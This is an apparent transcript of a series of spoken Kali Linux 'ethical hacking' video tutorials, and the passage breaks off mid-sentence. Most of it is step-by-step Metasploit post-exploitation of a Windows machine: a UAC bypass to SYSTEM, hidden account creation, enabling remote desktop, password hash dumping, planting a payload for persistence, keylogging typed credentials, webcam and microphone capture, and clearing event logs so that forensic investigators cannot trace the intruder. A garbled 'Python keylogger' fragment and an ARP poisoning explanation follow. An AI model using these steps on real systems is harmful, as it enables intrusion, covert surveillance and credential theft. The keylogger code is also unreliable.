Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in my previous tutorials, you might be wondering that I was talking since one or two tutorials previously that I would be teaching you to gain access into the system, and I have taught you to gain access into the system but being rhetorically, but it's just virtually, but not actually into the system. You're only the administrator or the normal user right now. So let's see how we can go ahead and gain access into the system. Once you have the Meterpreter command prompt open over here, so you can see I have already the access. I have taught in previous tutorial how we can go ahead and gain access into that. I'll just type get privs, and as you can see, these are the enabled process privileges, but I cannot actually go ahead and this means that I only have these privileges. I don't have the whole system privileges, and in order for me to go ahead and get the system privileges, I'll have to go ahead and exploit the user account control, and I should be able to go ahead and bypass that. So let's go ahead and check if we could go ahead and do that. So I'll just type use priv, and as you can see, the privilege extension is already loaded. That means I have the privileges, but I only have it for the administrator. So but now I want it for the system, so I'll just go ahead and type for system info and see what all things are there. So the privilege access is for test user, that is the administrator, and Windows 7. And if I go ahead and type get privs over here, you can see that I have the shutdown, change notification privilege, and undock privilege. That means if I have these three privileges, I mean I'm not just the test user, I am the administrator as well. But now we want to go beyond this thing and we want to gain access to that. So I'll just go ahead and first get the session into background. The reason being that I don't want to run this from the Meterpreter. I want this Meterpreter on, but I want to go ahead and use our MSF console to go ahead and do that. So I will first go ahead and check all the sessions. Okay, sorry, I will have to do that from the background. So I'll just first go ahead and check. I need to type run. Now this is a payload that I'm going to execute, so I'll type run post because it is under the folder named post, then windows/local/ sorry, no, not local, it's for the later one, post windows gather /win _ privs. So this will go ahead and run the post windows database, and it will try to give us all the information. Let's see what happens now. As you can see, previously when I ran get privs, okay, I'll just show it out to you if I'm able to. Okay, when I ran get privileges, it only showed me all the privileges that I have, but when I ran this database, it's showing me that it is not an admin, that means a system admin, it is not the system, and user account control is enabled, and I am just the test user, that is a PC. But if you go ahead and check over here, if I type, you can see I am the administrator. So you might be wondering why it is not showing that I am not the admin. The reason being that Windows 7 has an inbuilt administrator. Whenever you go ahead and try to if you forget your password, it is a system inbuilt local administrator that goes ahead and enables your PC. So let me check if I could enable the other one. I won't be able to do that from over here. I'll have to do that from the command prompt again, which I won't be doing that because I don't need that. And I can change the user account controls from over here. This proves that I am the system administrator. And over here it is showing that I am the admin, but I am not the system admin exactly. Means in deep the default administrator, inbuilt administrator. I am just the normal administrator that is created by the user. So in order for me to go ahead and do that, I'll have to go ahead and exploit that and run this into background. So I'll just go ahead and type it over here. I'll just type bsckground, that's background, and the Meterpreter shell is still working. If I want to get back to that, I can just go ahead and type sessions-l. It will show me the first one is still working. I can do I_1 to get back to that, but I'll just go ahead and get into the background. And just be sure that if you're trying this, what I'm trying to teach you, make sure that every word, every space is as exactly as I'm typing, else there will be a problem. And even if by trying once you're not able to do that, you're not able to gain access to that, that means that there may be a timeouts limit which this Meterpreter has to gain access to system after bypassing the user account control. If you delay that, then again you won't be able to gain access to that. You will have to start everything from the cipher, that is 0. That means from the background again, the one which I would be teaching you right now. So just make sure that you do all of these things as quickly as you can. So I'll just do background, session 1 is still running, and I'll type search UAC, and it will take a bit of time because it's trying to gather the database and all the payloads and exploits that is there in the system. We would be running one of the exploits and not the payload exactly, because we already have the payload in our victim's computer. So as you can see, I have all of these three payloads, and one is the post, this one which I used previously. I have the exploit Windows bypass injection, which is very good. It's given over here, but it is quite old, and I have the ask. We'll do only go ahead and escalate the execute run as. I want to bypass the user account control, so I would be using this one, exploit Windows local bypass. So, and it is a very good one. As you can see, it's given excellent. So I will use, and I will be using this one. So I'll just go ahead and copy it and paste it over here. Use exploit / Windows local bypass UAC, and I'll hit enter. That means I am using it. Nothing will happen right now once you go ahead and press that. So after that, I will just go ahead and type set. I need to set this specific payload to our computer. So I'll type set payload Windows / and I'll type Meterpreter / reverse _ TCP, because we are going to use the Meterpreter prompt. That's why, and I'll hit enter. And so as you can see, I have set the payload to the Windows Meterpreter reverse TCP. After that, I need to go ahead and use set the our local host, that means my own computer's IP address. So I'll type set L host, and I'll just go ahead and check. And this is my IP address. So I'll just copy and I'll just paste it over here. So 192.168.236.130, and I need to go ahead and set the local port for that, where I would gain access. And there's one thing important that I would like to teach you right now over here, that you cannot go ahead and use the same port that you created while creating this own original payload through which we have access to the system, because if you go and do that, it will straight away quit and it won't allow you to even use the normal Meterpreter, because it will have two incoming connections whereas there is only one port. So, and port is something like, for example, I'll tell you in detail how exactly a port works. Let's say, for example, you want to go ahead and ship something to your house. So I'll just go ahead and open the GEDIT. Okay, so let's say, for example, you want to go ahead and get something to your house. So how exactly would you write down the address? You will write down the your room number. That would be, let's say, for example, 453 would be your room number, and then you will type the building name or your society name, whatever it is. So let's say John's apartment, and then it would be like the where you stay, the area. So I'll just type, let's say, Sydney Road. The country name, let's say, for example, maybe it's California. So I'll just type California, and the zip code of whatever, 54321 example. So, and I'll teach you how exactly the system connection works of a port over here. Over here, I'll just go ahead and write 453 is your port. That is the room number. That means it cannot be the same. It cannot access multiple things at one port. So over here, this is your port. That is your 453. After that, this John's apartment. This is your IP address range. Not exactly IP address range, or I can also call it as the MAC ID range. And after that, this California, that means this third part, this is your IP, that your internet provider. So that's ISP. So this is how it works. So whenever you go ahead and ask for incoming connection, it will first check the ISP. That means whenever you go ahead and order something, they will first check your state. Once they come to your state, they will check your apartment or your road name, that is the IP address and MAC ID, and then finally the port. So in this way it works. So now the same thing I want over here. I want a good L port name, that is local port name. So I cannot use the same name because I am already using that. That means you cannot enter two people from the same door. So I'll have to use some other port. So let's say I'll use 2960 for example. And after that, first thing I would like to tell you is that this may not work because I already used a lot of time explaining that. So if this goes and I'm not able to run this, I'll go ahead and run it again just to make you know. And after that, since I have set the L port, I need to go ahead and use this session. So I'll just go ahead and type sessions -L. This is the ID of our session is 1. So I'll type set session space 1 and make sure that this session is only session, not sessions, unlike over here. And you need to make sure that this is in uppercase, not lowercase, else it will not work. Set session 1. And now finally I need to check whether everything is correct. So I'll type show options. Perfect. So as you can see, this is the IP address of our listener of my computer. This is the L port from which we will be gaining the connection, and the ID is 0. That means we are using it to go ahead and access Windows into 32-bit system. So I'll just go ahead and type exploit right now, and it should go ahead and exploit that. Let's say if we are able to go ahead and bypass the system settings. I believe it's working perfectly. Perfect. It just ran perfectly. So as you can see, user account control is set to default, and I have already bypassed this setting. If I go ahead and run this in the background, as you can see, I should be getting 2 connections in total. So if I go ahead and type sessions-L, I had 2 connections over here. The first one is the default test user, the second one is the administrator. So I will go ahead and type sessions-I space 1. Okay, sorry, I wanted to go ahead into 2. Perfect. And I'll get and type get sys, I'll just type sysinfo, and I'm still the test user, but let's take if I have the privileges of a system. So I'll just go ahead and try to get system. Perfect, it ran. Whereas previously when I tried to run it, it gave me an error. Let me check if I'm able to see that. Okay, let me just check where it is exactly. Okay, task kill. This is where the command prompt is. Okay, we should be here somewhere. When I tried get system previously, it did not work. It gave me some kind of error previously. Or rather than going ahead and searching this, I have better idea of actually going ahead and showing you. Let me just check. Okay, so when I tried get privileges previously, it only gave me these privileges. And right now if I go ahead to the background, if I go ahead and background this session, and if I go ahead and use this session 1, and if I type get system, it won't. The reason being that I do not have the system privileges over here, whereas in session 2, okay, I'll just go ahead and background this session. As in session 2, if I go ahead and type get system, it works perfectly. So now I am the system and I can do anything that I want. That means I can go ahead and edit any of the files that I want, and I can even go ahead and clear the event logs or view my own Windows password, which we did not have when we were trying to access the ARP desktop, that's the remote desktop. So that is it guys for this tutorial. In the next tutorial I'll be teaching you how we can go ahead and modify the system files so that even if a forensic investigator goes ahead and tries to search as to who accessed the system, he will not be able to. So that's it guys, I'll be meeting you in the next tutorial. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial I taught you as to how we can go ahead and gain access to this system, and you already have become the system and you are not the administrator anymore. So let me check. As you can see, previously when I typed, I only had the undock privilege and the change notification privilege and the shutdown privilege, but now I have all the privileges, even more than the normal administrator. So this is if you think that this is not much, I'll show you how we can go ahead and run a remote desktop. So I'll just go ahead and type, let's say, run. I don't know exactly if this work or not, -h, and let's see. Okay, So as you can see, I have the Meterpreter over here. So if I want to go ahead and gain access through the same terminal, I can just type, unlike previously where I had to open a separate terminal, I can just type getgui-u space the username, that is the test user -p, and the password is abcd@123. And okay, let me check. Okay. Okay, sorry, I did a mistake. GTGUI will go ahead and create another operating system, and this test users already exist. So what I was trying to do mistakenly was to go ahead and create another user, and I already have one. So let's go ahead and try to create another user if you want. And I'll just go ahead and type test2, or I'll just go ahead and use Mr. Smart _smart. And the password would be, let's say, xyz@123. Let's see if we are able to go ahead and create another account. Perfect. So I have now created another account with the user, and if I go ahead and let's check if how many users are there. And okay, I'll need change manager other account. As you can see, I have the Mr. Smart over here already, and I can go ahead and access that if I want, just by using the remote desktop session. So if you think that this is not much I have already created, then I can go ahead and do something else as well. So I'll just go ahead and show you one more thing. It will be execute -h -f command period exe -a /c net user. And since as you can see, I have Mr. Smart as the administrator, and I want to go ahead and remove that right now. So I can just go ahead and type once I have done. And whenever you go ahead and access into someone's computer, it's better not to use the same you can say as you want the forensic investigator to not even go ahead and have an idea exactly what you did. So if you go ahead and use the same account which the user has, then the administrator or the forensic investigator can easily know that what all things were done, because he only has one thing to check. But if you go ahead and create another account, you access that, you do whatever you want to do, such as gathering information, gathering data, or hijacking all the data from the remote computer, and after that, if you want, you can even go ahead and delete this specific account, and then the person will not be able to even know that there was another account created. He won't even be able to guess that. So now after that, if you want to go ahead and delete, you can just type the username net user. But the username would be Mr._Smart, I believe that is the name. Okay, Mr. Smart, and /delete, and I'll hit enter. As you can see, process 1196 was created, it's showing. And if I go ahead and try to check, as you can see, I don't have that account anymore. Perfect. So this is one way of doing that, and this is how it works. So if this is not it, then I'll show you one more thing. As you can see, I can also go to enable remote desktop. If I had let me check if I had it disabled. Let's check. If I go ahead and do that, let's check what happens if I go ahead and use it over here. Let's see if I'm able to go ahead and enable the remote desktop. As you can see, the remote desktop was disabled. I have enabled it, and the terminal services is already set to auto, so there was no necessary, and there was a local firewall open, out of which there is a Windows Defender default, and I have enabled it right now. So if now I go ahead and check it over here, I should be getting that remote desktop is enabled. Perfect. Allow allow connections from computer running any version of desktop. Again, I'll show you something. Apply. I will go over here. I'll go ahead and start that, and now as you can see, it is still do not allow. I will go ahead and close this, and once this is over, perfect, I will go ahead and check the remote desktop options. Perfect, it is set to allow. And now the last time it was not working. Let's go ahead and try to gain access to this specific computer. Perfect, it's working right now. So as you can see, I have the remote access to that computer, and now I can do anything that I want, but the user over here is already logged out. So this is how it works exactly in detail, and yep. So that is it for this tutorial, guys. In the next tutorial, I'll be teaching you as to how we can go, what are the different Meterpreter commands, and this is not just it. There are many more things that I would be teaching you, such as again changing directories, uploading files, and making sure that whenever you upload a file to the remote computer, you are going ahead and copying it to your start menu, so that whenever the computer starts, your payload automatically runs. And I'll be showing you how we can go ahead and read text files, create remote directories. We can also go ahead and modify the routing as well as forward a local port to our remote computer. We can also go ahead and drop into a system command. We can even go ahead and steal impersonation tokens, and we can also go ahead and shut down and reboot the computer as well. So that is it for this tutorial, guys. Let's go ahead and take a look at the next tutorial. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, I taught you how we can go ahead and get into the system and get the hash passwords for our Windows 7 thing. So as you can see, when I ran the hashdump database, I have already received the password. I did not even need to go ahead and crack that. So I'll go ahead and show you this once more if you want, but this is how it works likely. And as I told you that it gave me out the hash password, but over here it also gave me out the exact password, that was abcd@123. So if you are not able to go ahead and get this password, if you had some tough password which has multiple characters and everything, then you need to go ahead and run the auxiliary auxiliary run auxiliary / analyze and /jtr, I believe it, crack _fast run auxiliary analyze fast. Let me just check if I have auxiliary /analyze /jtr _crack _fast. And if you're unable to run this, you need to go ahead and run this command, or you can also go ahead and type use over here. But I don't believe that you would need to use that, because when you go ahead and use the hash thing, you already easily go ahead and get the password for that, as I have got over here. So that's how you can go ahead and use this, and once you have this password, you can simply go ahead and gain access to that using a remote desktop or whichever you want. So but that's not it. There are many other things that you can go ahead and do. Let's say, for example, I have this test1 file and I have these two things over here, and I wanted to run these two as a, let's say, these two commands, netstat and cmd. So I can go ahead and try to run those files from over here. Let's see where we are exactly. I am in system 32, so I'll just go ahead and get back to, let's see where I am. Okay, I'm still in Windows and I am in C drive right now, so I'll just go to users and let's check. We have the test user, so I'll go to test user and I'll go to desktop. Perfect. And now I want to go ahead and run this test1 file, so let's go ahead and check if I can do that. Resource space, and so I need to go ahead and give the test file, so I'll just type test1.txt. So okay, no such file .txt. Let me check test1. Okay. I'm sorry for that. It's not the file that we have stored over here. Sorry for that. And if you wanted to go ahead and run any specific commands from our computer that I had over here, then I can go ahead and do that. So let me check the local working directory. I'm in set. So let me check. I can just go ahead and create a new script over here, and I can go ahead and run that for this computer. So there is one way of doing that. Let me check. I have not yet tried that as of till now. So let's check test txt, and I'll just go ahead and let's say cmd and netstat. These are two commands that I want to run. Let's see if I can run them. It is just test. Okay, perfect. As you can see, I ran all of these commands just by which I had written over here, and I was mistaken. It was not over here, it was over here. So if you want to go ahead and get into a system, quickly do what you want to do and get out, then you can go ahead and already create a list of commands that you want to do, and you can go ahead and run that through the Meterpreter prompt. So CMD did not work because it was a need to go ahead and install. I can only run what is there inside a command prompt, so that's the reason it did not run. Netstat ran perfectly, and if I go ahead and let's say I write ipconfig and I'll save it, if I go ahead and run the resource again, I'll get the ifconfig file. So, and if I want to go ahead and read that directory, so let me check. Like I need to go ahead, I'll just go ahead and okay, back. Perfect. Now over here, if I want to go ahead and I have this ABC file, this is an awesome file, and if I need to go ahead and run that, I can just go ahead and type, let me first check where I am. I'm in desktop, so I can just type cat, and I can type over here ABC to txt. As you can see, I have this is an awesome file, and any number of time you can run, you will see whatever is there in this directory. Perfect. Now okay, so next thing that I would like to do is I need to go ahead and upload something from my computer into that computer. So this is something that you would want to do at the very start, and not something like from over here. So where I am doing right now, after getting the system, you would not want to do that. So the first thing that I would like to do is to search where my payload is. That is over here, payload.exe. I'll just let me check. Okay, I'm still in SCT. So I want to upload /user share SCT and payload.exe, and now I want to state where I want to go ahead and run that or upload that. So I'll have to type the specific place's name. So I need to go ahead and insert that. So I need to go ahead and type let's say, hey, wait, I'm already there, so I don't need to. Perfect. I can straight away go ahead and do this. So I'll just type C : and let's say I want to go ahead and just need to go ahead and insert this later on. First I need to insert the route where I want to go, and the name of the file would be, let's say, if I want to copy it into the C drive, or let's say I want to copy it on the test user, that is the desktop over here. So I'll type users, I'll just copy it, I'll just copy it from over here and paste it over here, and I can go ahead and C users, test user, desktop, and the name of the file would be, let's say, I want to copy it to the desktop, but I want it to be, I already have a payload on desktop, so I'll just copy it into C. Fine. So the name would be, let's say, for example, payload period exe, and I want to know where it is exactly, so I'll type /user. Let me check if I could just go ahead and type payload.exe. okay, command, no such file or directory, C /payload.exe. that would be the file name. Okay, sorry, actually it should have been exactly the opposite. The payload should be over here and the C drive should be over here. Okay, perfect, uploaded. So let's go ahead and check the C drive right now. As you can see, I have the payload file. So similarly, you can go ahead and just simply copy it to the startup drive of Windows, and it will run just perfectly fine. If you want to check where you are working right now, so you can just type get wd, and it will show you where you are right now. If you want to check which local directory are you in the Kali Linux, so you can type get lwd, that's get local working directory. If you want to change the local working directories file, then you can go and type lcd For our remote, you need to type cd, again mkdir, mv, and all of these, most of these things are the same, except that if you want to go ahead and port forward or forward a local port to a remote service, then you need to type port fwd to go ahead and port forward anything. If you want to go ahead and view and modify the routing table, then you can go ahead and type route, and you will see all the routing tables over here. So port forward would be the same thing, and 0 total local ports forwarded, because I have not yet provided anything to that. If you want to steal token of something, you can just go ahead and type steal underscore token, and it will go ahead and try to steal a token of specific PID that I need to go ahead and insert, and I can later go ahead and use that to create an impersonation token. If I go ahead and type suspend, it will straight away go ahead and delete, or sorry, it will straight away go ahead and suspend our remote computer. Get prefs is what I have told you previously. I can also go ahead and get the username of the current session by typing get UID. And I am the system right now. As you can see, if I was previously the administrator, I would be shown as the administrator. Now these are fine, but there are still other things that you would want to know, like killing a process. You need to just type kill. To get the list of running process, you can just type ps, or get PID to get the current process identifier, or reboot to go ahead and remove the local host. But what if you want to go ahead and edit the registry file? We can do that as well. You just need to type reg, and that is the registry, and whichever value that you want to go ahead and edit or enumerate, you can still do that from over here. Now if you want to check since how many time the computer is still on, you can just go ahead and type idle time, and you can see it's since 2 hours 26 minutes the user has been idle. That means he has not done anything. If I go ahead and do something like over here, and I have just clicked, and if I go ahead and type the idle time, it's just 2 seconds, because that means the computer did something and went away again. The PS person came. Now there are a few other things that I would like to teach you, such as going ahead and getting a screenshot, using a keylogger, or inserting a keylogger in the person's computer. But that would be it for this tutorial. In the next tutorial, I'll teach you how you can go ahead and insert a temporary keylogger as well as a permanent keylogger, or how you can go ahead and write a keylogger in Python and insert that into your target's computer, and then go ahead and gain all the information that you need about related to either it be a Windows password or any his VMware's password, either it be a Gmail, Facebook, or any of his important accounts password or login credentials, anything. So that would be for this tutorial. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing. In the previous tutorials, I taught you as to how we can go ahead and gain access to the remote computers and get the system, that means the NT authority 1 that we want. So now that we have access to the system, I have shown you what all things we can do, that is gaining access, maintaining access. Now it's time to go ahead and gather information about what the user is doing exactly. So what I could do, I can also go ahead and disable the keyboard, or enable the keyboard, enable the mouse in the system computer, and a lot of other things. So let's first start with going ahead and gathering the keystrokes of our person as to what he is doing exactly. So let me check if I'm able to go ahead and okay, let's check if my net is still working. Perfect. So I'll just go ahead and start the keylogger. So once you have the system access, you can just go ahead and type keyscan keyscan underscore start and hit enter. So the keystroke has already been started. So whatever I do, each and everything will be stored over there. So I need to go ahead and sniff that. So I need to go ahead and type keyscan underscore dump. So that means whatever it is doing, the person is doing, I will start getting that over here. So I'll just go ahead and go to google.com. Let's see if I'm getting that. As you can see, whatever I pressed over here, I'm getting all of these things. I pressed GOO and then down and return. Or if I go ahead and close this, open, and if I go ahead and type google.com and hit enter, and if I go over here and if I go and try to dump, I should get that I typed Google down and then return. That means the enter button. Now let's say I want to go ahead and gain access to my Gmail account. So I won't be actually accessing my Gmail account. I'll just type, let's say, skyfall.abc@gmail.com, and I'll just go ahead and type tab, and I'll go ahead and use my password, any random password. Let's say I am root. So I entered the email, I entered the password, and I hit enter, and no, and I actually used my fake one. So if I go ahead and dump the keystrokes, I should get that. Perfect. Skyfall.abcd@gmail.com, then I press tab, and I am root, that is the password. So in this way you can also go ahead and gather keystrokes of any person that you want, and if you want to go ahead and stop, you can just type key scan underscore stop, and it will stop. The key sniffer will be stopped. If you and for example, for some reason you are not the system, you are just a local administrator, and you're not able to go ahead and bypass the UAC, it's because sometimes the person's antivirus is far more powerful and it does not allow you to bypass that, then you can still go ahead and view what the person is doing rather than gaining a remote desktop session. You can just go ahead and type over here such as screenshot, and whatever the person does, it will be stored over here in the SET. So as you can see, this is the page of over here. This is exactly the same. If I go ahead and, let's say for example, I open my task manager, and if I go ahead and type the screenshot again, another screenshot should be saved over here. It's this one. Okay, perfect. As you can see, the screenshot is saved. Let's just close this thing, and I'll delete this. So in this way you can still go ahead and gain access to that. And let's see if the person has webcams. As of now I don't have it over here, but if I had a webcam, then I can just go and type webcam underscore list. It will show me all the webcams that they have. And if I want to, let's say if the person has a webcam and I want to go ahead and take a snapshot of what the person is doing, then I won't be able to run that because I don't have a webcam. But still, if you had, then you can still go ahead and type webcam underscore snap, and it will take a picture of what the person is doing. If you want to go ahead and get a live session as to what exactly the person is saying, that means he won't be able to hear you out, he or she, they won't be able to hear you out, but you can still see what the person is doing, you can still hear what they are doing. Then you can type webcam underscore stream and -h, and by doing this it will go ahead and take you to the specified webcam, and -h would be the number of webcam that you get over here. When you type webcam underscore list, it will be either 1 or 2 or whatever you get. And if you want to go ahead and chat to the person directly, then you can type webcam underscore chat, and a chat session will directly be started. Or if you just want to record the voice of the person, you can still go ahead and type record underscore mic -h. H again would be the number of the mic that you have found, and you can just go ahead and it will be saved over here again, and everything will be done. Now this is far enough, but if you want to go ahead and everything is done, you just want to clear all your records, then you need to go ahead and clear the event records. So for that you need to go ahead and type clearev, clear ev. It will clear all the event records. That means whatever you did from the starting, that means gaining access to the system, modifying or making any changes, and then getting back. So after this you need to go ahead and, after you have cleared the event records, go ahead and delete the fake user that you have created, and again go ahead and clear the event record so that there won't even be an event record that you deleted the event records previously. And one fine thing that I'd like to show you would be to go ahead and disable the user interface of the person. This is just for fun. If you want to do it, is like UICTL, not only for fun. If you want to go ahead and just mess around with the person, you can just go ahead and type, and you can see that you can go ahead and enable or disable the keyboard or mouse. So I'll just go ahead and see my mouse is working right now, and I'll just go ahead and disable the mouse and disabling mouse. So if I go over here, as you can see, my mouse is not working. Doesn't matter what I click, my mouse is not working. I'll just go ahead and enable that, and my mouse is enabled again. Perfect. And let's say for example, if I'm writing something, not this one, yes, if I'm writing something, like you can see, I can write anything over here. If I want, I can still go ahead and disable the keyboard as well. So this is not just the keyboard. Any USB that is attached, may it be a pen drive or anything else, the person will not be able to access that as well. So I'll just go ahead and enable that once more. Perfect. Okay, and that is it for this tutorial, and I'd also like to go ahead and teach you one last thing before I go ahead and end this tutorial. That would be to go ahead and create a keylogger. So I'll just go ahead and end this session right now. You can just go ahead and upload the keylogger by creating that. And one last thing that I'd like to teach you would be, if you want to go ahead and download something from over here, let's say I'll go ahead and save this, and I want to go ahead and copy some files from this PC to my own computer. I can still do that. Let me check where I am exactly. I'm still in the desktop, so I can just go ahead and type download, and what is the name of the file? Let me check. It was ABC. So I'll just type, let me check. I don't remember exactly as to how I did it previously. So you can just go ahead and type download, let's say C/users / I'll just go ahead and type, copy it over here. And I want to copy the abc.txt. Okay, I think I would be needing a single quote right now. Parse error, let me check. Okay, I believe I just did not complete the code. As you can see, the file has been downloaded, and I have the file over here. Perfect. This is an awesome file. So, and this is an awesome tutorial as well. So yeah, and I'll be closing this session, and I'll be deleting this both as well, and this and this, and I'll be showing you as to how we can go ahead and finally I'll teach you how we can go ahead and create a Python script. And you need to go ahead and create this Python script over here in Windows. Go ahead and install the Python from over here, Python Windows 7, and you can download it from over here, the 2. And I would recommend downloading the 2.7 version, because I need you to download other files as well. After you have downloaded the Python from over here, the 2.7.9 version, you need to also download the PyHook and PyWin32. And so you can just download, just go ahead and type, you need to download all the modules, PyHook, and okay, and you can download it from over here, and the PyWin32, I believe. Yeah, PyWin32 as well. So once you download all of these things, you can just go to Windows 7. I have not yet installed it in my Windows 7, but I have that installed over here in my Python. It is inbuilt in Kali Linux. As you can see, I'll just go ahead and run Python, and I have that inbuilt over here. So, but you need to go ahead and install over here, since you would need to go ahead and create a keylogger for Windows. So you can just go ahead and open the notepad. Since I don't have the installed, I'll just open the notepad, and this would be the source code for creating a keylogger in Python. So you need to type bind key return, and then you need to type instead of writing that, you can just type from tkinter import asterisk root equals to tk, and define read ignore print hello. And you can also go ahead and ignore this root. I'm just going ahead. This is just a friendly keylogger, that in case if you even go ahead and let's say you're unable to go ahead, even if you go ahead and quit or remove your Python, not Python exactly, sorry, your payload, then even this will go ahead and help you to create this. And this is the basic main part of that. So this is how you can go ahead and create a keylogger by using these files. And yes, that is it for this tutorial. In the next tutorial, I'll be teaching you more about how we can go ahead and also use Kali Linux to go ahead and inject our own payloads into our Windows updates, as well as I'll also be teaching you how we can go ahead and create a Trojan horse, which I can go ahead and insert into an MP3 file or a PDF file and send it to our client. And finally, we would also be learning Android hacking, that is going ahead and let's say getting into anyone's Android system, even iOS, our Lumia, that's our Microsoft phone as well. That is for it for this tutorial. I'll be meeting you next tutorial, guys. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So I have shown you previously how we can go ahead and use the Java applet method and the PDF file Trojan horses. But in this tutorial, I will be teaching you something different, that is man in the middle attack, or it's also called as monkey in the middle attack. So what to be more precise, in short, what you're doing is that there are two computers and you are sitting in between their connection, and whatever passes in between them, you are sniffing, modifying, changing, or poisoning all of these cache memories, or not only cache memories, also the active bits that are being transferred. So that's how it works, but there are different ways as to how we can go ahead and do that. And this is a simple way as to how we can go ahead and do that. This is the server, this is the client. The client tries to access the server, but you are sitting in between, and most of the time this happens in public Wi-Fi hotspots. So let's say, for example, this is a McDonald's, and this is you are trying to use the open server of McDonald's, that is the Wi-Fi hotspot that they have, which is most of the time open, and this is the attacker, that is me sitting over here. So when you try to go ahead and log in on the McDonald's Wi-Fi hotspot, you are sending the information, but the information is not directly going over there. It's being transmitted to me, and then I can go ahead and redirect it with where I want, or I can go ahead and poison it and send something else to the server. And then if the server sends something, I can go ahead and modify that again and send it back to you. So I'm just sitting in between, and I am going ahead and doing all the changes that I need. But there are different ways of attacks, and there are multiple types of attacks which we can do, because when you go and try to connect to your client, there are multiple things happening in the background, like gathering DNS information or the ARPs and multiple other things. So these are the different types of attacks that are there in man in the middle attack. That is local area network. That means it's just on it's not on the internet, it's just between inside the company. It can be like, you can say, as the intranet, for example. So these are different types of attack, that is ARP poisoning, DNS spoofing, STP mangling, and port stealing. And then we have through a gateway from local machine to a remote machine. They're doing the same thing again: ARP poisoning, DNS spoofing, DHCP spoofing, ICMP redirection, IRDP spoofing, and route mangling. And finally, once we have the remote access, we can again go and do DNS poisoning, traffic tunneling, and route mangling finally. So I would be teaching you some of these stuffs today, and I'll let you know how exactly these works. So we will start today with ARP poisoning, and I'll tell you how this works exactly. This is how an ARP poisoning works. The user is connected to the client and you are in between, so you know what's happening exactly between the user and the server, and the actual data that you pass is never reaches the server. It goes through you and then it reaches server, and whatever the server reply, and you know what exactly is happening. So whatever you are trying to send, the attacker can go ahead and modify and send something else back to you. So for example, if you go and try to access youtube.com, the attacker will go ahead and redirect that traffic to, let's say, for example, any random website, let's say wonderhowto.com or google.com, for example. So it doesn't matter how much time you go and try to visit Google, it will still redirect you to google.com, because it is the attacker what is happening. Or if it's trying to access facebook.com, it doesn't matter even if it's through HTTPS website, the person can still go ahead and gain access through that by going ahead and stripping off the SSL from your, that is the security from your 128-bit encrypt. So that's how it works. So let's start with what ARP poisoning is and ARP spoofing is exactly. So you may not be knowing what ARP spoofing is exactly, so I'll just go ahead and define that for you in simple terms. The full form of ARP is Address Resolution Protocol. And ARP protocol is something different, and let me tell you that there are two different things. If you go and search on web, that is ARP poisoning and ARP spoofing. they're almost the same, or I can say that not exactly the same, but one is a part of the other. That means ARP spoofing is a part of ARP poisoning. So that means if you are poisoning the ARP, then spoofing is automatically happening in the background. So as you can see, we have two computers. One is the original computer. This is the server through which it goes, and I am the attacker over here. And this is the HP laser printer jet, and this as the IP address. So ARP is a protocol for mapping an internet protocol address, that's IP address, to a physical machine. So it goes ahead and gives a specific IP address to a physical machine, and it is recognized in only the local area network. For example, in IPv4 version, the most common level of IP in use today, an address is 32 bits long, and in Ethernet or local area network, the address, however, for attached devices are 48 bits long, and the physical machine is also known as the media access control or the MAC address. And a table, which is usually called as the ARP cache memory, is used to maintain a correlation between each MAC addresses and the corresponding IP addresses. ARP provides the protocol rules for making this correlation and providing addresses conversion in both directions. So when an incoming packet destined for let's say a host machine on a particular local area network arrives at a gateway, the gateway asks the program to find a physical host or MAC address that matches the IP address. So as you can see in the diagram over here, it's asking that who has the IP address of 192.168.0.45. It's asking either of these three computers, because these three are the LAN connection right now. So, and the ARP program looks in the ARP cache memory then, and if it finds the address, it provides it so that the packet can be converted to the right packet length, that is 32-bit or 48-bit, whichever it is, and format it and send it back to the machine. If no entry is found for the IP address, ARP broadcasts request packet in a special format to all the machines on the LAN to see if one machine knows that it has that IP address associated with it, and the machine will then automatically go and contact back to the originating machine. And the machine that recognizes the IP address as its own returns a reply, so indicating the same. And ARP updates the ARP cache for future reference first, and then sends the packet to the MAC address that replied. So you might be wondering, what is ARP poisoning exactly? So it is that, to be in simple terms, normal hackers lie, and skillful hackers lie very well. And hackers that are well-rounded, they can lie both to machines as well as people. Lying to people is known as social engineering, and it involves tactics which was detailed at length by convicted hacker Kevin Mitnick, such as posing as a company's employee so that the company's real employees will blab all their secrets freely. But lying to machine involves lots of different techniques, and one of the most commonly used one is ARP cache poisoning, and that is the focus of this tutorial. ARP poisoning enables local hackers to cause general networking mayhem because it's mostly incurable, and every administrator should be aware of how this works. ARP is basically a form of networking roll call. It is a very simple protocol which consists of merely 4 basic messages. The first is that at the ARP request, computer A asks the network who has this IP address, and ARP reply, as you can see on the diagram over here, that this is my MAC IP address. And then a reverse request by ARP, that is RARP, that is called as, and it is the same concept as the ARP request, but over here the computer A, that is the Jessica's computer over here, it replies who has this MAC address after they have the IP address, and then the computer HP LaserJet printer replies that it has the MAC address. So first it checks the IP address, then it checks the MAC address. So all network devices have an ARP table, a short-term memory of all the IP addresses and MAC addresses, and the device has already matched together. The ARP table ensures that the device doesn't have to repeat the ARP request for the devices it has already communicated with. So here's an example. I'll go ahead and teach you of a normal ARP communication about the Jessica and the HP LaserJet printer, which I will be teaching you today. So, but that is it for this tutorial, guys. Which I was about to tell you as to how ARP works. In the next tutorial, I'll be teaching you in detail as to how this works exactly, along with an example. And later on, we would be trying that, and after that, we will go ahead and inject our main viruses inside our software payload, for which we would obviously be needing the ITER which is again takes back to the MITM, that is man in the middle attack. So that is it for this tutorial. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So I'll be continuing the previous tutorial. So in the previous tutorial I taught you about what is ARP exactly and how it works, and I also taught you about the man in the middle attack, what exactly it is. So here's a simple example of the Jessica, the receptionist, that tells the word to print the latest company's contact list. So I'll be teaching you this example in detail so that you will know what ARP poisoning or ARP spoofing is, and then we will take a look at later on at DNS spoofing, DNS poisoning, the difference between them, and later on finally the traffic tunneling. So here's an example of normal ARP communication. Jessica is a receptionist in a latest company, in a good company, and it tells the word, my MS Word, to print the company's latest contact list. So this is her first print job today, and her computer has the IP address 192.168.0.16. She wants to send the print job to HP LaserJet printer, and the IP address of the HP LaserJet printer is 192.168.0.45. So Jessica's computer broadcasts an ARP request to the entire local network asking 